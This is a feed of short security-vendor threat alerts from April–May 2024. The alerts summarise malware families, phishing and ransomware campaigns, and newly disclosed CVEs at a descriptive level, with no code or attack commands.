Springtail threat group uses new Linux backdoor in attacksALERTSAPTIn a newly released report, Symantec’s Threat Hunter Team sheds light on a recently discovered Linux backdoor developed by the North-Korean Springtail espionage group (aka Kimsuky). This group is linked to malware used in a recent campaign against organizations in South Korea. The campaign leveraged Trojanized software installation packages to deliver the backdoor.

16.5.24 | New malware Cuttlefish | ALERTS | VIRUS
A new malware dubbed Cuttlefish was reported to infect small office/home office and enterprise-grade routers with the intent to monitor passing data traffic and discreetly exfiltrate only authentication-related information such as usernames, passwords, and tokens. It also has the capability of introducing more payloads.

16.5.24 | Remcos RAT expands functionality with PrivateLoader module | ALERTS | VIRUS
Remcos RAT, a remote access Trojan, enables unauthorized remote control and surveillance of compromised systems. Recently, Remcos RAT was observed leveraging a PrivateLoader module to augment its functionality and persistence on the victim's machine. By employing VB scripts, registry modifications, and establishing services to restart the malware at varying intervals, this malware can thoroughly infiltrate a system, evade detection, and report statistics to its C2 server.

16.5.24 | Malicious Minecraft mod harvests data from Windows system | ALERTS | VIRUS
Many gamers prefer to enhance their gaming experience with custom mods, such as those offering the Windows Borderless feature. This feature enables multitasking and seamless switching between applications, facilitating tasks like game recording.

16.5.24 | Atomic Stealer (AMOS) among the malware variants spread in the GitCaught operation | ALERTS | VIRUS
A recent malicious campaign dubbed GitCaught has been reported to spread multiple infostealing payloads targeted at various platforms including macOS. The distributed malware variants include Atomic Stealer (AMOS), Vidar Stealer, Lumma and the Octo banking trojan. The attackers have been leveraging fake profiles and repositories hosted on GitHub that offer software binaries masqueraded as various popular applications. Threat actors behind this campaign have also been utilizing web-based infrastructure including FileZilla FTP servers for malware delivery.

16.5.24 | PureCrypter malware used in Mallox ransomware distribution campaign | ALERTS | VIRUS
The PureCrypter loader has been used in a recent malicious campaign leading up to the delivery of Mallox ransomware payloads. The attackers have been reported to employ brute-force attacks against vulnerable or otherwise misconfigured MS-SQL servers in the initial attack stages. PureCrypter is a Malware-as-a-Service (MaaS) offering, potentially leveraged by various affiliates. The delivered payloads might also exfiltrate user data before encryption, as the Mallox ransomware operators have been known to employ double extortion techniques in past attacks.

16.5.24 | Malicious Word Document Dropping DanaBot Malware | ALERTS | VIRUS
A recent DanaBot malspam campaign was observed being delivered via a Word document containing a malicious external link which, if clicked, launches a series of events in which additional executable files are downloaded, including command prompt and PowerShell components. This process eventually leads to the dropping of payloads such as iu4t4.exe (DanaBot) and rundll32.exe, which are responsible for collecting sensitive user and system information.

15.5.24 | Phorpiex botnet distributes LockBit Black Ransomware via email campaign | ALERTS | BOTNET
A high-volume email campaign facilitated by the Phorpiex botnet, delivering LockBit Black ransomware, has been reported. Phorpiex functions as a Malware-as-a-Service platform and has amassed a significant customer base among threat actors over more than a decade of operation. Since 2018, Phorpiex has been involved in activities such as data exfiltration and ransomware distribution. Despite attempts to disrupt its operations over the years, the botnet continues to persist.

15.5.24 | Dracula (Samurai) Stealer | ALERTS | VIRUS
Dracula (also known as Samurai Stealer) is an infostealing malware variant attributed to the threat group known as the Amnesia Team (aka Cerberus). This threat actor is known for using various other infostealer variants including Aurora, Lumma, Redline and Rhadamanthys, among others. Dracula Stealer is leveraged by the attackers to exfiltrate a wide range of confidential information from victim machines, including credentials, banking information and others.

15.5.24 | WaveStealer: New malware distributed on messaging platforms | ALERTS | VIRUS
WaveStealer, a newly emerged sophisticated malware tool, is being distributed on platforms like Telegram and Discord for purchase at a low cost. This malware is disguised as video game installers and designed to extract various types of sensitive data from compromised systems. It targets web browsers, cryptocurrency wallets, credit card numbers, as well as data associated with messaging platforms like Telegram and Discord. Additionally, WaveStealer has the capability to capture screenshots, enhancing its data exfiltration capabilities.

15.5.24 | FIN7 malware campaign exploiting Google Ads | ALERTS | VIRUS
A malware campaign exploiting Google Ads, attributed to the threat actor FIN7, has been reported in the wild. The attackers utilized deceptive websites masquerading as well-known brands like AnyDesk, WinSCP, BlackRock, Asana, Concur, and Google Meet. Visitors to these sites, often directed through sponsored Google Ads, encountered fake pop-ups urging them to download what seemed to be a browser extension. However, the downloaded payload was actually an MSIX file, a packaging format for Windows apps, which delivered NetSupport RAT and DiceLoader for subsequent stages in the infection chain.

15.5.24 | Beast Ransomware and Vidar Infostealer delivered via disguised documents | ALERTS | RANSOM
Documents like copyright violation warnings and resumes were leveraged in a recent campaign to deliver ransomware and an infostealer. Infection begins with a phishing email containing an external malicious link which, if clicked, downloads a compressed file. Upon decompression, two executable files are dropped; these are identified as Beast Ransomware and Vidar Infostealer.

15.5.24 | GCash Users Targeted in Latest Smishing Scam | ALERTS | SPAM
Mobile wallets have transformed the financial landscape by providing convenience and accessibility, but they also present lucrative targets for cybercriminals, as Symantec continues to observe a flurry of smishing around the world.

15.5.24 | Trinity Ransomware | ALERTS | RANSOM
According to recent research published by Cyble, Trinity is a newly identified ransomware variant believed to be an updated version of the “2023Lock” ransomware. The malware encrypts user files and appends the “.trinitylock” extension to them. Trinity ransomware has also been reported to share some of its code base with yet another ransomware variant known as Venus. The threat actors behind Trinity employ double extortion techniques, also exfiltrating confidential files and threatening to publicly release them.

15.5.24 | Malspam campaign delivers ASyncRAT by way of multiple scripts | ALERTS | VIRUS
In a recently observed campaign, multiple scripts were used to deliver the ASyncRAT payload. Initiated by an HTML email attachment, victims would be compromised by various non-PE files to deliver and establish persistence of ASyncRAT. The attack downloads a Windows Script File (WSF) that in turn launches a VBS file that's responsible for further execution. Latter parts of the attack are carried out by JS, PowerShell, and batch script components.

15.5.24 | Black Basta ransomware attacks target the healthcare sector | ALERTS | RANSOM
Symantec Security Response is aware of the recent joint alert from CISA, the FBI, the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) regarding a number of targeted activities observed for the Black Basta ransomware. This malware variant has been known since at least 2022 and has been leveraged in a number of campaigns targeted at critical infrastructure, including the Healthcare and Public Health (HPH) sector. Black Basta is a ransomware-as-a-service (RaaS) variant mostly distributed via phishing or exploitation of disclosed vulnerabilities. The attackers behind this malware often employ the double extortion model, not only encrypting user files but also exfiltrating them and threatening public release of the stolen data.

15.5.24 | A Mining Trojan called Hidden Shovel | ALERTS | VIRUS
Researchers uncovered a new mining trojan dubbed "Hidden Shovel", discovered through network security monitoring. This Trojan was initially spotted back in November 2023 and has been undergoing multiple upgrades, currently at version 3.0. Hidden Shovel's key features are strong concealment, anti-analysis measures, a DLL hijacking backdoor and shellcode injection capabilities.

12.5.24 | CVE-2024-24506 - LimeSurvey Community Edition XSS vulnerability | ALERTS | VULNEREBILITY
CVE-2024-24506 is a recently disclosed Cross Site Scripting (XSS) vulnerability affecting LimeSurvey Community Edition version 5.3.32. The bug is caused by improper validation of user-supplied input in the Administrator email address field. If successfully exploited, the vulnerability might allow remote attackers to insert and execute arbitrary code via the Administrator email address parameter.

12.5.24 | CVE-2024-1313 - BOLA vulnerability in Grafana | ALERTS | VULNEREBILITY
CVE-2024-1313 is a recently disclosed Broken Object-Level Authorization (BOLA) vulnerability affecting Grafana, an open-source data visualization web application. Successful exploitation of this vulnerability might potentially lead to unauthorized access and data leakage from vulnerable dashboards. Unprivileged attackers might be able to bypass authorization and also delete Grafana dashboard snapshots. The Grafana vendor has already released a patch to address this vulnerability.

10.5.24 | Exploitation of Ivanti Pulse Secure vulnerabilities for Mirai botnet delivery | ALERTS | EXPLOIT
In January of this year, Ivanti reported two vulnerabilities, CVE-2023-46805 (Authentication Bypass) & CVE-2024-21887 (Command Injection), affecting Ivanti Connect Secure and Ivanti Policy Secure Gateways.

10.5.24 | Malware campaign targeting Windows and MS Office users via software cracks | ALERTS | VIRUS
A malware campaign distributing RATs and coinminers via cracks for popular software, specifically targeting users of Windows and MS Office software, has been observed. The malware, once installed, often registers commands in the task scheduler to maintain persistence, enabling continuous installation of new malware even after removal.

10.5.24 | Coper Actors Abuse LiveChat CDN in Ongoing Fake Chrome Tactic | ALERTS | VIRUS
Symantec continues to observe daily instances of Coper malware disguised as a fake Chrome Android application. This tactic is not new, having been in use for some time now. The attack chain's initial step remains uncertain, but recently observed Coper samples have been hosted on a content delivery network (CDN) used by LiveChat, a customer service platform.

10.5.24 | Malspam campaign: Password protected archive hosted on GitHub leads to AsyncRAT | ALERTS | CAMPAIGN
Over the past two weeks, Symantec has observed an actor leveraging a peculiar attack chain to distribute a highly obfuscated payload onto compromised systems. The attacks start with malicious emails containing a malicious PDF, DOCX, or SVG file (REMITIRA A TRAVES DEL SERVICIO POSTAL AUTORIZADO.docx, Radicado juridico 23156484.svg, and 99-DEMANDA .docx).

10.5.24 | Russian bulletproof hosting services exploited for malicious activities, SocGholish malware campaigns | ALERTS | EXPLOIT
The use of Russian bulletproof hosting services for hosting malicious activities, including command-and-control (C2) servers and phishing pages distributing SocGholish malware, has been reported. Multiple malware campaigns in recent months have utilized the Matanbuchus loader, with their C2 infrastructure hosted on bulletproof hosting services like "Proton66 OOO".

10.5.24 | Malicious Minecraft Mods: zEus stealer targets gamers | ALERTS | VIRUS
A malware campaign targeting Minecraft players has been reported, where custom packages promising to enhance the game's appearance are actually distributing the zEus stealer. This infostealer is designed to evade detection while stealing sensitive data and dropping additional payloads, typically in the form of a batch file, to establish communication with a command-and-control (C2) server for further instructions. This malware is capable of capturing screenshots and exfiltrating data to a webhook server controlled by the threat actor.

9.5.24 | Continuous Distribution of RokRAT Malware | ALERTS | VIRUS
APT37 (ScarCruft) continues to distribute RokRAT malware via LNK files, particularly targeting South Korean users. The malware, disguised within a genuine document, executes PowerShell commands after activation. Subsequently, these commands execute additional files, enabling attackers to gather user information and transmit that data back to their C2 servers.

9.5.24 | Gadfly buzzes inboxes with new phishing campaign | ALERTS | CAMPAIGN
Symantec has recently observed an uptick in phishing campaigns being delivered out of Gadfly (aka TA577). This campaign entices users to open the attached PDF, named with a Latin word, containing a link utilizing typosquatted subdomains for Microsoft login services, with the end goal being credential theft for later use.

9.5.24 | Hunt Ransomware - another Dharma/Crysis variant | ALERTS | RANSOM
Hunt is another Dharma/Crysis ransomware variant discovered recently in the wild. The malware encrypts user files and appends the .hunt extension to them, alongside a unique victim ID and the threat actor's email address. The ransom note, dropped in the form of a text file, asks the victims to contact the attackers via the provided email address for further instructions on how to restore the locked files.

9.5.24 | CVE-2024-27956 - WP-Automatic Plugin SQL Injection vulnerability exploited in the wild | ALERTS | VULNEREBILITY
CVE-2024-27956 is a recently disclosed critical (CVSS score 9.8) SQL injection (SQLi) vulnerability in the WP-Automatic plugin prior to version 3.92.1. Successful exploitation of this vulnerability might allow attackers to run arbitrary SQL queries, create new admin accounts or upload malicious files onto compromised servers. This vulnerability has been reported as being actively exploited in the wild.

9.5.24 | Shinra Ransomware | ALERTS | RANSOM
Shinra, a recently discovered ransomware variant from the Proton malware family, encrypts files and appends the ".SHINRA3" extension while renaming file names to random strings. A ransom note is dropped as a text file called "#SHINRA-Recovery.txt" containing contact details, typically the attacker's email address.

9.5.24 | CVE-2024-2389 - Command Injection vulnerability affecting Progress Flowmon | ALERTS | VULNEREBILITY
CVE-2024-2389, a recently disclosed critical vulnerability with a CVSS score of 10, affects Progress Flowmon, a widely used network performance monitoring tool. If successfully exploited, the bug allows unauthenticated attackers to access the Flowmon web interface via crafted API requests. This compromise can further lead to arbitrary code execution on vulnerable systems. A proof-of-concept for this vulnerability has been released publicly and the vendor has already issued a patched version of the application.

9.5.24 | Increase of Lockbit ransomware attacks | ALERTS | RANSOM
Earlier in February this year, the Lockbit ransomware family was targeted in a coordinated disruption operation called "Operation Cronos" that saw multiple members of this ransomware gang arrested, assets seized and a decryption tool released publicly. Despite those efforts, Lockbit still remains active in the threat landscape and we recently observed a spike in detections related to this ransomware variant. Symantec's Advanced Machine Learning technology played a crucial role in blocking this attack by detecting the malicious emails at the beginning of the attack chain.

7.5.24 | CVE-2024-4040 - CrushFTP vulnerability exploited in the wild | ALERTS | VULNEREBILITY
CVE-2024-4040 is a recently disclosed injection vulnerability affecting CrushFTP versions before 10.7.1 and 11.1.0. Successful exploitation of this vulnerability could allow unauthenticated remote attackers to perform a VFS sandbox escape, bypass authentication, gain administrative privileges and potentially execute arbitrary remote code on vulnerable servers. The vulnerability has been reported as being exploited in the wild and the vendor has already released a patched version of the application.

7.5.24 | Counterfeit Revenue Agency page distributing VBlogger malware | ALERTS | VIRUS
A malware campaign involving a counterfeit Revenue Agency webpage hosted on an Italian domain has been reported. Upon accessing the site, users unwittingly download an archive containing a malware downloader, which in turn fetches the final payload via FTP from Altervista. The malware, dubbed "vblogger", is developed in VB6 and possesses keylogging and clipboard capture functionalities. The harvested information is stored in a text file and then sent to the command-and-control (C2) server on Altervista.

7.5.24 | Cuckoo: A new macOS malware targeting music ripping applications | ALERTS | VIRUS
A new macOS malware dubbed Cuckoo has been reported. This malware is distributed through websites that offer applications for ripping music from streaming services. Cuckoo boasts extensive functionality, including the collection of browser-stored information such as passwords, cookies, and other credentials. Additionally, it gathers system information and data related to installed cryptocurrency wallets and extensions.

7.5.24 | Android malware used in targeted attack against Indian defense forces | ALERTS | VIRUS
A socially engineered delivery through WhatsApp was leveraged to reportedly target Indian defense forces with a new Android malware presenting itself as a defense-related application. Upon successful delivery, the application would install itself under the guise of a Contacts application. Upon execution, the app would request permissions for SMS, Contacts, Storage, and Telephone and subsequently remove itself from view.

3.5.24 | NiceCurl and TameCat custom backdoors leveraged by Damselfly APT | ALERTS | APT
NiceCurl and TameCat are two custom backdoor variants recently leveraged in malicious campaigns attributed to the Damselfly APT (also known as APT42). These backdoors are reported to be delivered mostly by spear-phishing campaigns and used by the threat actors for the purpose of initial access to the targeted environments. While NiceCurl is a VBScript-based malware with capabilities to download and execute additional modules, the TameCat backdoor is used to execute PowerShell and C# scripts as well as download additional arbitrary content.

3.5.24 | TesseractStealer malware leverages OCR engine for information extraction | ALERTS | VIRUS
TesseractStealer is an infostealer recently distributed by variants of the ViperSoftX malware. This malware leverages Tesseract (an open source OCR engine) in an effort to extract text from user image files. The malware focuses on specific data related to credentials and cryptocurrency wallet information. Next to TesseractStealer, some of the recent ViperSoftX runs have also been observed to drop another payload from the QuasarRAT malware family.

3.5.24 | A recent Darkgate malspam campaign | ALERTS | CAMPAIGN
The infection chain for this campaign initiates from an email file with an HTML attachment. This HTML file uses a background image that resembles a blank Microsoft Document file, where instructions on how to fix the offline viewing of the file can be seen. This is an attempt to trick victims into pasting malicious PowerShell code into a Windows Terminal. Once the code is executed, an HTA file will be downloaded and will continue to execute, eventually downloading a follow-up ZIP file. Once extracted, it will launch an open-source automation engine called AutoIt to execute a malicious AutoIt script named script.a3x that will eventually load the Darkgate trojan.

3.5.24 | Latest macOS Adload variant focuses on detection evasion | ALERTS | VIRUS
A recent report by SentinelOne outlines changes observed in the macOS malware Adload. The most recent variants of this malware family come with capabilities allowing it to evade the latest Apple XProtect signatures. Adload malware has been present in the macOS landscape for several years now, known to be distributed via drive-by-downloads and often used in attempts to hijack browser search results, inject ads into webpages or deliver various payloads to the victims.

3.5.24 | Old dogs teaching new tricks to ZLoader | ALERTS | VIRUS
ZLoader, a modular trojan, has implemented anti-analysis capabilities that appear to be lifted from the ZeuS source code. This 'new' ability allows ZLoader to block installation on machines other than the one where the initial infection occurred, stopping further stages from deploying, in the hope of hindering in-depth analysis.

3.5.24 | Goldoon botnet | ALERTS | BOTNET
According to a recent report from FortiGuard Labs, a new botnet variant dubbed Goldoon has been observed in the wild. This malware targets the exploitation of an old D-Link vulnerability from 2015, CVE-2015-2051, for its propagation. Goldoon can establish persistence on the affected device and execute commands received from C2 servers. The attackers might use this malware variant to gain control over the infected devices, collect system information as well as perform various forms of distributed denial-of-service (DDoS) attacks.

3.5.24 | BirdyClient malware leverages Microsoft Graph API for C&C communication | ALERTS | VIRUS
An increasing number of threats have begun to leverage the Microsoft Graph API, usually to facilitate communications with command-and-control (C&C) infrastructure hosted on Microsoft cloud services. The technique was most recently used in an attack against an organization in Ukraine, where a previously undocumented piece of malware called BirdyClient used the Graph API to leverage Microsoft OneDrive for C&C purposes.

3.5.24 | DarkGate loader continues to be actively distributed | ALERTS | VIRUS
DarkGate loader malware has been very actively distributed over the last year. Numerous email campaigns have leveraged various attack chains to deliver the DarkGate payload. Some emails have been observed containing direct download links, while others use attachments (PDF, ZIP, etc.) to initiate the delivery.

3.5.24 | Dwphon mobile malware | ALERTS | VIRUS
Dwphon is a recently identified malware variant targeting the Android platform. The malware has the functionality to collect information about the infected device, information about applications installed on the device, as well as some confidential personal information. Dwphon might consist of several distinct modules, each with its own functions and C2 instructions.

3.5.24 | SpyNote using Central Bank of Kazakhstan as a lure | ALERTS | VIRUS
No countries or financial institutions are exempt from having their brands abused to lure mobile users into installing Android malware, a trend that continues to grow. Symantec has recently observed an actor actively targeting users in Kazakhstan with the SpyNote RAT.

3.5.24 | GuLoader campaign targeting industries in Russian-speaking countries | ALERTS | CAMPAIGN
An actor has been observed running two email campaigns with different social engineering tactics that lead to GuLoader. Both campaigns target industries in Russian-speaking countries such as Russia, Belarus, Kyrgyzstan, and Kazakhstan.

30.4.24New DragonForce Ransomware variantALERTSRANSOMA new variant of ransomware called DragonForce has been observed using a leaked ransomware builder from the LockBit ransomware group.DragonForce Ransomware targets victim(s) with the intent of extortion. The threat actor typically employs a double extortion tactic by locking the victim(s) out of their infected machines and exfiltrating data before encryption. If the victim(s) fail to meet the demands imposed, the threat actor will release the data to others via the dark web.
30.4.24Security vendor applications impersonated in recent malware campaignALERTSVIRUSImpersonating legitimate applications is a common tactic observed in attack campaigns. Among the simpler methods of impersonation is to convince a victim to execute content by leveraging a legitimate filename. In a recent report published by Sophos, they have identified activity in which attackers are modifying legitimate binaries of security vendors to launch newly embedded malicious payloads. It should be noted that modifying such files will break digital signatures and conversely de-legitimize the applications.
30.4.24Ziraat Stealer disguised as data recovery toolALERTSVIRUSThe Ziraat Stealer, a .NET infostealer, has been discovered masquerading as a Data Recovery tool. This malware is capable of extracting passwords and credentials from browsers, social media platforms, and various email applications. Moreover, it can conduct screenshot and keylogging activities. Classified as a specialized Remote Access Trojan (RAT), this malicious software has the ability to extract sensitive information from compromised systems.
30.4.24Rising trend of FakeBat malware campaigns, exploiting MSIX installers and malvertisingALERTSVIRUSMany campaigns involving the FakeBat malware have been reported recently, showing an increasing trend. FakeBat utilizes multiple delivery tactics, with malvertising being the primary strategy. This involves exploiting online advertising platforms, including Google Ads, to spread the malware. What makes FakeBat unique is that the threat actor uses MSIX installers packaged with heavily obfuscated PowerShell code.
27.4.24Multiple vulnerabilities in OpenMetadataALERTSVULNEREBILITYOpenMetadata is an open source metadata platform that can be used for data discovery, cataloging and collaboration. According to a recent report, threat actors have been exploiting critical vulnerabilities including authentication bypass and SpEL Expression Injections in OpenMetadata in efforts leading to deployment of cryptomining software. The recently disclosed OpenMetadata vulnerabilities include CVE-2024-28253, CVE-2024-28254, CVE-2024-28255, CVE-2024-28847, and CVE-2024-28848 and affect product versions prior to 1.3.1. If successfully exploited, the discussed vulnerabilities might allow unauthenticated remote attackers to achieve remote code execution (RCE) on affected instances.
27.4.24KageNoHitobito ransomwareALERTSRANSOMKageNoHitobito ransomware came on the scene in March 2024. This is a no frills ransomware with basic old school functionality; file encryption (only on the local drive), drops ransom notes, and requires interaction with the attack group via Tor. There are no indications of any data theft for extortion functions. Data shows that this ransomware has been seen in multiple countries across the world.
27.4.24Brokewell mobile malwareALERTSVIRUSBrokewell is a new mobile malware variant discovered in the wild. According to a recent report, the malware is delivered to Android users via a fake Google Chrome browser update package. The malware features extensive infostealing functionalities including hardware information collection, credential exfiltration, call logs retrieval, audio capture, screen streaming, capture of taps, swipes and text inputs as well other various remote access and device takeover capabilities.
27.4.24Amadey malware family remains an active threat in the landscapeALERTSVIRUSAmadey is an infostealer variant enriched with additional functionalities allowing it to download and execute malicious payloads such as ransomware. While this malware family has been known for a relatively long time, new Amadey samples are found in the wild almost every day. Modular architecture combined with both infostealing and payload loading capabilities allow for this malware to be used in miscellaneous of campaigns by different threat groups. Amadey is known to be distributed via a wide variety of ways including malicious attachments, drive-by-downloads masqueraded as cracked software, malvertising or exploit kits.
25.4.24SSLoad and Cobalt Strike leveraged in compromised "Contact Form" campaignALERTSAPTA new loader has emerged called SSLoad, distinct from SLoad. Reports reveal a campaign where attackers were observed abusing and sending malicious links via contact forms. Clicking these links will download and install the SSLoad malware, then this DLL-based loader will deploy further backdoors and payloads, including a Cobalt Strike beacon to establish connection to the attacker's C2 servers to exfiltrate system and user information.
25.4.24SpyNote campaign using Vietnam's National Public Service as baitALERTSAPTSpyNote remote access trojan and its variants are proliferating globally, with groups and individuals employing various social engineering tactics to target mobile users. In a recent campaign, Symantec observed the threat (DỊCH VỤ CÔNG.apk) masquerading as an official app from Vietnam's National Public Service web platform, which offers extensive online public services for both citizens and businesses.
25.4.24APT43 exploits Dropbox in TutorialRAT distribution campaignALERTSAPTThe APT43 group has been observed distributing TutorialRAT by actively exploiting Dropbox cloud storage as a base for their attacks to evade threat monitoring. This campaign appears to be an extension of APT43's BabyShark threat campaign and employs typical spear-phishing techniques, including the use of shortcut (LNK) files. TutorialRAT is a C#-based remote control program that functions as an infostealer, collecting and exfiltrating device and users' personal information .
25.4.24 | CryptBot among the infostealer variants distributed in latest CoralRaider campaign | ALERTS | VIRUS | According to a recent report, three distinct infostealer variants, CryptBot, LummaC2 and Rhadamanthys, have been distributed in a newly discovered campaign attributed to the threat actor known as CoralRaider. The threat actors have been leveraging Content Delivery Network (CDN) cache as a malware delivery mechanism. The new variant of CryptBot can steal a wide variety of data from compromised machines, targeting data held in web browsers, cryptocurrency wallets, authenticator apps and password managers.
25.4.24 | Seedworm exploits Atera Agent in a spear-phishing campaign | ALERTS | CAMPAIGN | Seedworm (also known as MuddyWater) is actively abusing the legitimate remote monitoring and management (RMM) tool Atera Agent in its spear-phishing campaign. The actor leverages Atera's 30-day free trial offers to create agents registered with compromised email accounts, enabling remote access to targeted systems without establishing their own command-and-control (C2) infrastructure. Atera offers extensive remote control capabilities via its web UI, including file upload/download, interactive shell access, and AI-powered command assistance. The threat actor uses free file hosting platforms to host their RMM installers, distributing them via spear-phishing emails.
25.4.24 | Fake Job App Steals SMS Messages From Oil Industry Job Seekers | ALERTS | Mobil | Symantec has recently observed a malicious actor targeting mobile users who are looking for jobs in the oil industry. They have created a fake application ([company name] Jobs.apk) that appears to come from a significant player in the oil industry of Bahrain and the Middle East. Users who are successfully lured into installing the app are asked to input their phone numbers into a form. Unbeknownst to them, the malicious actors then monitor and steal all their SMS messages.
25.4.24 | More Fake MetaMask Android Apps Circulating, Targeting Users' Wallets | ALERTS | VIRUS | More fake MetaMask Android applications have been observed targeting mobile users' wallets via phishing tactics, all of which are hosted on malicious domains mimicking MetaMask and leveraging typosquatting techniques. These apps are most likely spread via malicious SMS.
25.4.24 | GooseEgg, a post-exploitation malware | ALERTS | VIRUS | Researchers at Microsoft have reported on ongoing activities of the Russia-based threat actor Forest Blizzard, identified by Symantec as Swallowtail (aka STRONTIUM), utilizing a custom tool dubbed GooseEgg. This activity has been taking place since at least 2020 and possibly as early as 2019. The tool exploits a vulnerability in the Windows Print Spooler service (CVE-2022-38028) to gain SYSTEM-level privileges and steal credentials from compromised networks. The recently observed campaign targets government, non-governmental, education, and transportation sector organizations, primarily in Ukraine, Western Europe, and North America.
23.4.24 | Kapeka backdoor | ALERTS | VIRUS | Kapeka is a recently identified backdoor leveraged in malicious campaigns targeting various entities in Eastern Europe since at least 2022. The backdoor is believed to have been distributed by the threat group known as Sandworm. Kapeka is written in C++ and its capabilities include fingerprinting the victim's machine, executing shell commands, reading and writing files and launching arbitrary payloads, among others. Kapeka can also update its own binaries or completely remove itself from the infected endpoint.
23.4.24 | Sharpil RAT malware - possible precursor to Sharp Stealer | ALERTS | VIRUS | Sharpil is a new Remote Access Trojan (RAT) discovered in the threat landscape. This C#-based malware features basic infostealing functionality, including system information collection and data gathering from various web browsers. Once on the infected machine, Sharpil connects to the attackers via a Telegram bot. Sharpil exhibits some code similarities with another recently identified malware variant called Sharp Stealer. That variant has been reported as being advertised for sale on Telegram, and it possesses some enhanced capabilities when compared to Sharpil RAT.
22.4.24 | Core Werewolf APT group targets Russian defense organizations in espionage campaign | ALERTS | APT | Espionage activity by the Core Werewolf APT group targeting Russian defense organizations was observed around mid-April. The attack used a malicious document as bait, purportedly concerning the presentation of state awards to special forces soldiers. However, the document is actually a 7zSFX archive containing a legitimate remote access tool, UltraVNC. Upon extraction, the malware creates copies of a decoy document and the UltraVNC executable, schedules tasks to run the executable, and establishes a connection to a designated server.
22.4.24 | Megazord Ransomware | ALERTS | RANSOM | Megazord ransomware is Rust-based malware that targets healthcare, education, and government entities. Initial attack vectors include spear-phishing emails as well as exploitation of vulnerable services. Tools such as RDP and advanced IP scanners are used for lateral movement. Once a system is compromised, Megazord terminates multiple processes and services and encrypts local volumes and files. Encrypted files are appended with the "POWERRANGES" extension, and a ransom note, "powerranges.txt", is dropped in each folder containing encrypted files. Victims are instructed to contact the threat actor via the TOX messenger, with reference to a unique Telegram channel link provided in the ransom note. Megazord shares multiple code similarities with Akira and is believed to be related to the Akira ransomware.
22.4.24 | OfflRouter observed infecting Ukrainian DOC files | ALERTS | VIRUS | Threat researchers have recently discovered OfflRouter infections in various DOC files observed in the wild. These documents contain VBA code that, once the document is opened, downloads an executable which searches the machine for other DOC files to infect and looks for additional plugins on removable drives.
20.4.24 | Coreid (aka Fin7) uses backdoor against US automaker victims | ALERTS | APT | A recent report provided details of activity by the Coreid (aka Fin7) threat group in which victims in the US automaker industry were targeted. According to the report, the campaign leveraged spear-phishing emails against selected targets, using socially engineered content related to free online scanning tools. The victim would be lured into following a link to a typosquatted domain imitating a legitimate online scanner.
20.4.24 | APT Group exploits Web3 gaming hype in campaign for cryptocurrency earnings | ALERTS | APT | A campaign centered around imitating web3 gaming projects has been observed, likely operated by a Russian-language APT group aiming for cryptocurrency earnings by leveraging the allure of blockchain-based gaming. Users are enticed to visit the main webpages of these projects to download the software. Once installed, the software infects devices with infostealer malware. Depending on the operating system, the malware variants include Atomic macOS Stealer (AMOS), Stealc, Rhadamanthys, or RisePro.
20.4.24 | Akira ransomware remains an active threat on the landscape | ALERTS | RANSOM | Symantec Security Response is aware of the recent joint alert from CISA, the FBI, Europol's European Cybercrime Centre (EC3), and the Netherlands' National Cyber Security Centre (NCSC-NL) regarding a number of targeted activities observed for the Akira ransomware. Akira is a ransomware family seen on the threat landscape since at least 2023.
20.4.24 | XAgent spyware targeting iOS devices | ALERTS | VIRUS | XAgent spyware targeting iOS devices has been identified and linked to the Swallowtail group (APT28). Primarily targeting political and government entities in Western Europe, XAgent possesses capabilities for remote control and data exfiltration. It can gather information on users' contacts, messages, device details, installed applications, screenshots, and call records.
19.4.24 | Malware campaign distributing MadMxShell backdoor via masquerade websites | ALERTS | CAMPAIGN | A new backdoor called MadMxShell has surfaced as part of a malware campaign. The threat actors responsible for the campaign are hosting masquerade websites that impersonate legitimate IP scanner software sites. Employing tactics such as typosquatting and SEO poisoning, they attract users through Google Ads. The backdoor uses DNS MX queries for command and control (C2) communication, aiming to evade memory forensics security solutions. The malware provides attackers with unauthorized access to compromised systems, allowing them to execute commands, exfiltrate data, and carry out other malicious activities.
19.4.24 | CR4T malware implant distributed in the DuneQuixote campaign | ALERTS | VIRUS | A malicious campaign dubbed DuneQuixote has been reported to distribute new variants of the CR4T malware implant. The campaign targets various organizations and entities in the Middle East. CR4T malware comes in two different strains, one written in C/C++ and the other in Go. The malware's functionality focuses on granting the attackers access to the infected endpoints, enabling remote command execution and arbitrary file upload/download.
19.4.24 | Mamont Android banking trojan | ALERTS | VIRUS | Mamont is a recently identified banking trojan for Android. The malware has been distributed disguised as a Google Chrome installer package. Mamont can collect information about the infected device, exfiltrate selected messages and intercept new messages, sending them to an attacker-controlled Telegram channel. The malware examines message content, focusing on messages related to financial or monetary transactions.
18.4.24 | Google Firebase and Clearbit abused in phishing campaigns | ALERTS | CAMPAIGN | Phishing actors employ a plethora of tactics to make their phishing attempts more persuasive, ranging from hosting services to social engineering. Among hosting services, abuse of Google Firebase has been prevalent due to its ease of use, free hosting, scalability, and domain customization features. These attributes make it an appealing platform for phishing actors seeking to host and distribute fraudulent content with minimal effort and cost.
18.4.24 | TP-Link Archer AX21 CVE-2023-1389 still being exploited by botnets | ALERTS | VULNEREBILITY | Last year an unauthenticated command injection vulnerability, CVE-2023-1389, was disclosed in the web management interface of the TP-Link Archer AX21 (AX1800) router. Despite this vulnerability having been reported and remediated, numerous campaigns still exploit it. Recent attacks have been observed using various botnets, including Moobot, Miori, AGoent, and Gafgyt. As botnets are known to target IoT vulnerabilities, users should install the latest updates and follow the manufacturer's remediation steps.
17.4.24 | CVE-2024-1852 - WordPress WP-Members Membership Plugin vulnerability | ALERTS | VULNEREBILITY | CVE-2024-1852 is a high-severity cross-site scripting (XSS) vulnerability affecting the WordPress WP-Members Membership Plugin. Successful exploitation could allow unauthenticated attackers to inject arbitrary web scripts into vulnerable pages. If executed in the context of an administrator, the injected script could additionally redirect site visitors to malicious URLs or lead to further compromise. The vulnerability has been addressed in version 3.4.9.3 of the plugin.
17.4.24 | SoumniBot - Android banking malware | ALERTS | VIRUS | SoumniBot is a new banking malware variant for Android. This malware has been reported to target mobile users in Korea. SoumniBot leverages several techniques to evade detection, such as an invalid compression method value, an invalid manifest size and overly long XML namespace names. Functionality-wise, this Android malware can collect information about the infected device, contact data and SMS/MMS messages, and exfiltrate digital certificates issued by Korean banks that are stored on the device.
